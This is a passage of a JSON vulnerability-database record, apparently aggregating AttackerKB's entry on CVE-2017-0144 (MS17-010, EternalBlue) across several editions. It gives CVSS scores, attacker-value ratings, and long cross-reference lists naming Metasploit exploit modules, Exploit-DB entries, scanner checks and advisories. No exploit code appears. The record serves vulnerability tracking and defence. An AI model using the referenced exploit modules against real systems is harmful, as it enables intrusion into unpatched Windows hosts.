Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-07-20T20:10:58", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"], "type": "attackerkb"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-20T20:10:58", "rev": 2, "value": 6.6, "vector": "NONE"}}, "hash": "090380c425da75da55c5435af43a40c07123d2b1ba124898ff5660e42a0e6128", "hashmap": [{"hash": "0404a0b8374966187f59ed4a2b846395", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "127216f4a57b3845fca792aa41d3d054", "key": "references"}, {"hash": "f3f172d109ebf206391628f4241045e7", "key": "cvelist"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "33304c5ad4f24166080d70e5d2fa6357", "key": "modified"}, {"hash": "d650c395d3b7dd2f2da9517bdf7ca6dc", "key": "title"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "6e0b7952dde138a784afb955c0264daf", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "77e144ca40ee58b38f8310032f97520a", "key": "href"}, {"hash": "5e5266bea17c39e5ee12abd5fcbf7c2b", "key": "reporter"}, {"hash": "dbbc8fce9a59d0a898c44c4f99244f4a", "key": "type"}], "history": [], "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "immutableFields": [], "lastseen": "2021-07-20T20:10:58", "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "AttackerKB", "title": "CVE-2017-0144 (MS17-010)", "type": "attackerkb", "viewCount": 7}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-07-20T20:10:58"}, {"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 4}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "enchantments": {"dependencies": {"modified": "2021-05-06T15:17:29", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"], "type": "attackerkb"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-05-06T15:17:29", "rev": 2, "value": 7.0, "vector": "NONE"}}, "hash": "3ba02f64891708bebd3f92e625e2cb46", "history": [], "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "immutableFields": [], "last_activity": null, "lastseen": "2021-05-06T15:17:29", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41891", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0144 (MS17-010)", "type": "attackerkb", "viewCount": 4, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "tags"], "edition": 2, "lastseen": "2021-05-06T15:17:29"}, {"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 4}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "enchantments": {"dependencies": {"modified": "2021-07-01T15:33:54", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"], "type": "attackerkb"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-01T15:33:54", "rev": 2, "value": 7.0, "vector": "NONE"}}, "hash": "e43e8fdf94a88237551f15a2db18b64c", "history": [], "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "immutableFields": [], "last_activity": "2000-01-01T10:00:00", "lastseen": "2021-07-01T15:33:54", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.6", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41891", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "reporter": "AttackerKB", "tags": ["easy_to_develop", "common_enterprise", "pre_auth"], "title": "CVE-2017-0144 (MS17-010)", "type": "attackerkb", "viewCount": 6, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "mitre_vector", "description"], "edition": 3, "lastseen": "2021-07-01T15:33:54"}], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "canvas", "idList": 